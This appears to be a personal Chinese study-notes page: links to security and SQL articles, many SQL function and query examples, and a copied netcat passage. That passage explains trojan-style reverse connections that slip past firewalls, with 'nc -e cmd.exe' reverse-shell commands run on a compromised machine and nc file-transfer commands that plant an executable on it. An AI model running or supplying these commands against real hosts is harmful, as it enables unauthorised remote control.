2017-12-28

http://www.freebuf.com/articles/web/156483.html // linux

http://www.cnblogs.com/stayreal/p/3907206.html // to read

http://blog.csdn.net/zsf1235/article/details/50974194 //sqlMap which is very useful

http://blog.csdn.net/earbao/article/details/49633789 //nc 瑞士军刀 //netcat

http://blog.csdn.net/zzyoucan/article/details/9235685

http://blog.csdn.net/a584226635/article/details/60757344

http://blog.csdn.net/lanzhizhuxia/article/details/7990005 // important ????????????

http://blog.csdn.net/xiong_1234/article/details/68926351 // sql easy query

http://www.cnblogs.com/stayreal/p/3906715.html // sql easy query
https://www.cnblogs.com/stayreal/p/3907206.html // sql diffcult query

sql常用函数
/*
version() database() user() currentuser()
str="abcd"
right(str,1) d
left(str,1) a
substr(str,1,1) b
replace(str,'a','A') Abcd
upper lower length len
floor(1.029) = 1
getdate() //获取当前时间
month(date) 月 year(date) day(date)
nvl(exp1,exp2) 如果exp1为空,则返回exp2,否则返回exp1
select nvl('','A') from Job // 'A'
nvl2(exp1,exp2,exp2) exp1 != null ? exp2 : exp3
select nvl2('a','A','B')) from Job // 'A'
ascii // 返回与指定字符对应的十进制数 ascii('A') == 65
chr // 给出整数,返回字符 chr(65) = 'A'
concat // 连接字符串 //常见于sql注入??? concat('abcd','1234') = abcd1234
instr(big,small,beginIndex,times) // beginIndex big字符串开始搜索的位置 ,times 第几次出现
select instr('oractle traning','ra',1,2) instring from Job

instring

9

rpad(str,count,ch) 在字符的右边补充count个ch 在列的右边粘贴字符

select lpad(rpad('gao',5,''),1,'') from Job

*gao*****

datediff(year,date,getdate())>10 // 获取工作年数大于10的

min max count avg

having group by like not like %c%

inner join left join right join full join + table2 + on +table1.xxx = table2.xxx
//查询员工姓名,所在部门编号和名称
select ename,EMP.dno,DEPA.name from EMP inner join DEPA on EMP.dno = DEPA.dno
因为dno重复了,所以要写清楚是哪个表的 EMP.dno

//查询员工姓名,工作,领导姓名 //带有重复字段的时候一定要加表名,不然分不清是哪个表的数据
select e1.name,e1.job,e2.name from EMP e1 inner join EMP e2 on e1.mang = e2.no

//查询员工姓名,工作,领导名字,部门名称
select e1.name,e1.job,e2.name DEPA.name from EMP e1 DEPA inner join EMP e2 on e1.mang = e2.no where e1.dno = DEPA.no

//查询每个部门的员工数量
select dno,count(*) from EMP group by dno

//求出每个部分的平均工资 降序排序
select dno,avg(sal) from EMP group by dno order by desc

//求出每个部门工资大于5000的员工数目
select dno,count(*) from EMP where sal>5000 group by dno

//求出每个部门最高工资
select dno,max(sal) from EMP group by dno

//求出平均工资大于2000的部门编号和平均工资
select dno,avg(sal) from EMP group by dno having avg(sal)>2000

//求出非销售人员外,所有从事同一工作,并且工资大于5000的员工的月工资总和,升序排列 order by //默认升序asc
select jno,sum(sal) from EMP where sal>5000 and job<>'sales' group by jno order by sum(sal)

and or union

//求出工资比7111高,与7112工作相同的员工
select * from EMP where sal>(select sal from EMP where eno=7111) and job=(select job from EMP where eno = 7112)

//求出最低工资的员工姓名,工作,工资
select ename,job,sal from EMP where sal=(select min(sal) from EMP )
*/

https://www.cnblogs.com/SnSpd/p/5926649.html // linux 常用函数 // what to do is to view common func and other
什么叫反弹端口?就是说,当对方中马后,不用你主动和对方连接,也就是说
不用从你的client端向对方主机上运行的server端发送请求连接,而是对方主动来连接你
这样就可以使很多防火墙失效,因为很多防火墙都不检查出站请求的。

这里这两个命令结合在一起后,于那两款木马可以说有异曲同工之效。为什么?
咳!!听我给你讲啊!!(先交100000000RMB学费)哇,别杀我啊!!)

nc -l -p 5277 (坚听本地5277端口)

同样也可以用

nc -l -v -p 5277

运行在本地

然后在远程机器上,想办法运行

nc -e cmd.exe ip 5277

(你可别真的打“ip”在肉机上啊)要打,xxx.xxx.xxx.xxx这样!!

呵呵,看看在本地机器上出现了什么?

这样就是反弹~~在本地机器上得到了一个SHELL

首先,在远程机上运行命令:

nc -v -l -p 5277 > c:\pulist.exe

这个命令还记的吗?呵呵,是不是和监听命令有点类似,对,没错,这个是监听5277端口

并把接受到的信息数据写到c:\pulist.exe中

这时候在本地机上运行

nc -v -n ip 5277 < e:\hack\pulist.exe

这个命令的意思就是,从本地E盘跟目录中读取pulist.exe文件的内容,并把这些数据发送到ip的5277端口上

这样远程主机就会自动创建一个pulist.exe文件。。

fd[0]:读管道,fd[1]:写管道。// 0 stdin 1 stdout 2 stderr

你可能感兴趣的:(2017-12-28)